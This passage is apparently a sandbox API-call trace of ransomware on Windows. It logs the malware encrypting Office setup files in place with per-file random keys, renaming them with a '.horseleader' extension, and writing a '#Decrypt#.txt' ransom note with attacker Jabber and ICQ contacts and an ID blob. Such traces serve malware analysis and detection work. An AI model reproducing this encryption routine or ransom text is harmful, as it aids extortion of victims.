Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.552] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 107 [0244.552] StrStrW (lpFirst="PSS10R.CHM", lpSrch=".txt") returned 0x0 [0244.552] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=27195) returned 1 [0244.552] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, 
lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.555] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.556] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.556] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x1a3b, lpOverlapped=0x0) returned 1 [0244.556] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe5c5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.556] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x1a3b, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x1a3b, lpOverlapped=0x0) returned 1 [0244.557] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.557] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.557] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.557] CloseHandle (hObject=0x15c) returned 1 [0244.557] GetProcessHeap () returned 0x780000 [0244.557] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.557] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.horseleader") returned 119 [0244.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.horseleader")) returned 1 [0244.558] GetProcessHeap () returned 0x780000 [0244.558] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.558] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49087c00, ftCreationTime.dwHighDateTime=0x1ca95c1, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x49087c00, ftLastWriteTime.dwHighDateTime=0x1ca95c1, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.CHM", cAlternateFileName="")) returned 1 [0244.558] lstrcmpiW (lpString1="SETUP.CHM", lpString2="Windows") returned -1 [0244.559] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 106 [0244.559] StrStrIW (lpFirst="SETUP.CHM", lpSrch=".horseleader") returned 0x0 [0244.559] lstrcmpW (lpString1="SETUP.CHM", lpString2="#Decrypt#.txt") returned 1 [0244.559] lstrcmpW (lpString1="SETUP.CHM", lpString2="_uninstalling_.png") returned 1 [0244.559] lstrlenW 
(lpString=".testttjffg") returned 11 [0244.559] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM", lpSrch=".testttjffg") returned 0x0 [0244.559] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.559] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.560] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 106 [0244.560] StrStrW (lpFirst="SETUP.CHM", lpSrch=".txt") returned 0x0 [0244.560] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=67190) returned 1 [0244.560] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.561] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.563] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.563] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.563] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x5b3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.563] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.565] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.565] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.565] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xb676, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.565] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.566] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.566] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.566] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.566] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: 
lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.566] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.567] CloseHandle (hObject=0x15c) returned 1 [0244.567] GetProcessHeap () returned 0x780000 [0244.567] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.567] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.horseleader") returned 118 [0244.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.horseleader")) returned 1 [0244.568] GetProcessHeap () returned 0x780000 [0244.568] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.568] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8728670, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf2b422b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) 
returned 1 [0244.568] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.568] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 106 [0244.568] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.569] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.569] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.569] lstrlenW (lpString=".testttjffg") returned 11 [0244.569] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.569] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.569] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.569] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.570] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 106 [0244.570] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.570] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=9352) returned 1 [0244.570] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x2488, lpOverlapped=0x0) returned 1 [0244.572] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffdb78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.572] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x2488, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x2488, lpOverlapped=0x0) returned 1 [0244.573] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.573] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.573] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.573] CloseHandle (hObject=0x15c) returned 1 [0244.573] GetProcessHeap () returned 0x780000 [0244.573] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.573] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.horseleader") returned 118 [0244.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 
Controller\\Office.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.horseleader")) returned 1 [0244.574] GetProcessHeap () returned 0x780000 [0244.574] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.574] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8728670, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf2b422b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.575] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.575] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\#Decrypt#.txt") returned 110 [0244.575] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.576] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.576] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.577] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.577] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.578] CloseHandle (hObject=0x1a4) returned 1 [0244.578] 
GetProcessHeap () returned 0x780000 [0244.578] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.578] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Office32.en-us", cAlternateFileName="OFFICE~2.EN-")) returned 1 [0244.578] lstrcmpiW (lpString1="Office32.en-us", lpString2="Windows") returned -1 [0244.578] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us") returned 98 [0244.578] lstrcmpW (lpString1="Office32.en-us", lpString2=".") returned 1 [0244.578] lstrcmpW (lpString1="Office32.en-us", lpString2="..") returned 1 [0244.578] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.578] GetProcessHeap () returned 0x780000 [0244.578] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.578] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\*") returned 100 [0244.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, 
ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.580] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.581] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\.") returned 100 [0244.581] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.581] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="..", cAlternateFileName="")) returned 1 [0244.581] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.581] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\..") returned 101 [0244.581] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.581] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.581] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc138cb0, 
ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="Office32MUI.XML", cAlternateFileName="OFFICE~1.XML")) returned 1 [0244.581] lstrcmpiW (lpString1="Office32MUI.XML", lpString2="Windows") returned -1 [0244.581] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 114 [0244.581] StrStrIW (lpFirst="Office32MUI.XML", lpSrch=".horseleader") returned 0x0 [0244.581] lstrcmpW (lpString1="Office32MUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.581] lstrcmpW (lpString1="Office32MUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.581] lstrlenW (lpString=".testttjffg") returned 11 [0244.581] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.581] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.581] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, 